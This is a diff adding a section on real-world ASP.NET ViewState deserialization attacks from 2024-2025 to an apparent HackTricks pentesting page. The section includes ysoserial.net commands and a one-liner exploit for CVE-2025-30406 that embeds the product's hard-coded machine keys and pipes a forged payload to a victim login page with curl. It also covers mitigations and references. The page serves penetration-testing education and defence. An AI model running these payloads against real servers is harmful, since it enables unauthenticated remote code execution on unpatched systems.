swisscodernano
diff --git a/‎src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md‎
Lines changed: 42 additions & 1 deletion b/‎src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md‎
Lines changed: 42 additions & 1 deletion
@@ -237,8 +237,50 @@ curl "http://victim/page.aspx?__VIEWSTATE=<PAYLOAD>"
 
 This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code.
 
+## 2024-2025 Real-world Exploitation Scenarios and Hard-coded Machine Keys
+
+### Microsoft “publicly disclosed machine keys” wave (Dec 2024 – Feb 2025)
+Microsoft Threat Intelligence reported mass exploitation of ASP.NET sites where the *machineKey* had previously been leaked on public sources (GitHub gists, blog posts, paste sites). Adversaries enumerated these keys and generated valid `__VIEWSTATE` gadgets with the newer `ysoserial.net` 1.41 `--minify` and `--islegacy` flags to evade WAF length limits:
+
+```bash
+ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \
+  --validationkey=<LEAKED_VALIDATION_KEY> --validationalg=SHA1 \
+  --decryptionkey=<LEAKED_DECRYPTION_KEY> --decryptionalg=AES \
+  --generator=<VIEWSTATEGEN> --minify
+```
+
+Rotating static keys or switching to *AutoGenerate* keys in Web .config (`<machineKey ... validationKey="AutoGenerate" decryptionKey="AutoGenerate" />`) mitigates this class of attacks. {{#ref}}
+
+{{#endref}}
+
+### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys
+Kudelski Security uncovered that multiple CentreStack / Triofox releases shipped with identical `machineKey` values, enabling unauthenticated remote code execution through ViewState forgery (CVE-2025-30406).
+
+One-liner exploit:
+
+```bash
+ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
+  --validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \
+  --validationalg=SHA1 \
+  --decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \
+  --decryptionalg=AES --generator=24D41AAB --minify \
+  | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx
+```
+
+Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. {{#ref}}
+
+
+{{#endref}}
+
 ## References
 
+- [Exploiting ViewState deserialization using Blacklist3r and YSoSerial.NET](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
+- [Deep dive into .NET ViewState deserialization and its exploitation](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
+- [Exploiting deserialisation in ASP.NET via ViewState (Soroush Dalili, 2019)](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
+- [Introducing badsecrets – fast machineKey discovery](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
+- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/)
+- [Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)
+- [Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)](https://research.kudelskisecurity.com/2025/04/16/gladinet-centrestack-and-gladinet-triofox-critical-rce-cve-2025-30406/)
 - [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
 - [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
 - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
@@ -250,4 +292,3 @@ This **key-exfiltration primitive** was mass-exploited against on-prem SharePoin
 {{#include ../../banners/hacktricks-training.md}}
 
 
-